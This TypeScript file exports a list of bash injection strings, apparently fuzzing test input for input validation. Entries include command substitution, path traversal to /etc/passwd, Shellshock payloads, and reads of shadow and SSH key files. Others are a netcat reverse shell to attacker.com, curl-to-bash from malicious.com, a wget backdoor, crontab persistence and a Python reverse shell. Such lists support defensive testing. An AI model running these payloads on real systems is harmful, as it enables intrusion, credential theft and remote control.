export const bashData: string[] = [
    '--version',
    '--help',
    '$USER',
    '/dev/null; touch /tmp/blns.fail ; echo',
    '`touch /tmp/blns.fail`',
    '$(touch /tmp/blns.fail)',
    '@{[system \'touch /tmp/blns.fail\']}',
    'eval(\'puts \'hello world\'\')',
    'System(\'ls -al /\')',
    '`ls -al /`',
    'Kernel.exec(\'ls -al /\')',
    'Kernel.exit(1)',
    '%x(\'ls -al /\')',
    '$HOME',
    '$ENV{\'HOME\'}',
    '%d',
    '%s',
    '{0}',
    '%*.*s',
    '../../../../../../../../../../../etc/passwd%00',
    '../../../../../../../../../../../etc/hosts',
    '() { 0; }; touch /tmp/blns.shellshock1.fail;',
    '() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }',
    '; cat /etc/passwd',
    '| ls -la',
    '&& whoami',
    '; rm -rf /tmp/test',
    '` cat /etc/shadow `',
    '| id',
    '; uname -a',
    '&& cat /etc/group',
    '$(whoami)',
    '`id`',
    '; nc -e /bin/sh attacker.com 4444',
    '| curl http://malicious.com/shell.sh | bash',
    '; wget http://evil.com/backdoor -O /tmp/backdoor',
    '&& chmod +x /tmp/exploit',
    '`cat /root/.ssh/id_rsa`',
    '; find / -name \'*.conf\'',
    '| grep -r \'password\' /etc/',
    '&& env',
    '$(cat /proc/version)',
    '; ps aux',
    '| netstat -tuln',
    '&& iptables -L',
    '`cat /var/log/auth.log`',
    '; history',
    '| tail -f /var/log/syslog',
    '&& crontab -l',
    '; echo \'* * * * * /tmp/backdoor\' | crontab -',
    '`sudo su -`',
    '; python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''
];
